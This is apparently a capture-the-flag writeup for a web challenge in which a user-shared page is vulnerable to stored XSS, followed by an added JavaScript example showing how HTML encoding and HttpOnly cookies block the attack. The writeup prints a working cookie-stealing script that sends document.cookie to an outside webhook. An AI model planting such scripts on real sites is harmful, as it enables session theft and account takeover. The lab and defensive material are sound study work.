# [EN] Cookie Stealer

###### tags: `Writeup` `Web` `English`

> [name=FlyDragon]

## Step 1

http://lotuxctf.com:20005/

At the beginning, it's a regular login page where you can register or log in.

<img src="https://hackmd.io/_uploads/BJ2Bo2W02.png" alt="photo" width="500" height="300">

After logging in, you can upload images and enter content, and you can `Share` or `Share to admin`.

<img src="https://hackmd.io/_uploads/Sy7TohZAn.png" alt="photo" width="400" height="300">

Using `Share` creates a page named `{username}.php`, and `Share to admin` means that after the page is created, `admin` will visit it.

![](https://hackmd.io/_uploads/rkIR2nWAh.png)

There are many places to upload a webshell, but RCE cannot get the flag. This challenge requires using XSS to steal the `admin`'s cookie.

## Step 2

First, test whether XSS can be triggered by entering the following JavaScript:

```
<script>alert(1);</script>
```

<img src="https://hackmd.io/_uploads/HkJDgaZA2.png" alt="photo" width="400" height="">

Successfully triggered.

![](https://hackmd.io/_uploads/S1hoxp-R2.png)

Next, test whether you can steal the visitor's cookie:

```
<script>
var flag = document.cookie;
fetch("{webhookurl}?cookie="+flag)
</script>
```

After using `Share`, you successfully receive your own cookie.

> Note: You should change `{webhookurl}` to a site that can receive requests, e.g. https://webhook.site/

![](https://hackmd.io/_uploads/H1yaOJGR3.png)

Using `Share to admin` will allow you to receive the flag.
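
Why both steps worked, and the two controls that would have stopped them, shown as an added example that is not part of the original writeup or the challenge's code. It models a share page that inserts content with and without HTML encoding, and a cookie set with and without `HttpOnly`; the names `alice`, `session` and `constructed-value` are constructed sample values.

```javascript
// Added example: a model of the share feature, not the challenge's server code.
// PAYLOAD is the test string from Step 2 of the writeup.
const PAYLOAD = '<script>alert(1);</script>';

// HTML-encode the five characters that can break out of a text context.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Build the shared page. encode=false reproduces the behaviour the writeup observed.
function renderSharePage(username, content, encode) {
  const body = encode ? escapeHtml(content) : content;
  return `<!doctype html><title>${escapeHtml(username)}</title><div class="post">${body}</div>`;
}

// Build a Set-Cookie header; hardened adds the attributes relevant here.
function sessionCookie(name, value, hardened) {
  const attrs = hardened ? ['HttpOnly', 'Secure', 'SameSite=Lax', 'Path=/'] : ['Path=/'];
  return [`${name}=${value}`, ...attrs].join('; ');
}

// Model of what a page script sees in document.cookie:
// browsers omit every cookie that was set with the HttpOnly attribute.
function documentCookieView(setCookieHeaders) {
  return setCookieHeaders
    .map((h) => h.split(';').map((p) => p.trim()))
    .filter((parts) => !parts.slice(1).some((a) => a.toLowerCase() === 'httponly'))
    .map((parts) => parts[0])
    .join('; ');
}

// Compare the weak and hardened variants side by side.
function demo() {
  const weakPage = renderSharePage('alice', PAYLOAD, false);
  const safePage = renderSharePage('alice', PAYLOAD, true);
  return {
    weakHasScript: weakPage.includes('<script>'),
    safeHasScript: safePage.includes('<script'),
    weakCookieView: documentCookieView([sessionCookie('session', 'constructed-value', false)]),
    safeCookieView: documentCookieView([sessionCookie('session', 'constructed-value', true)]),
  };
}

console.log(demo());
```

Output encoding removes the injection itself, while `HttpOnly` only limits what an injected script can read, so the two are applied together rather than as alternatives.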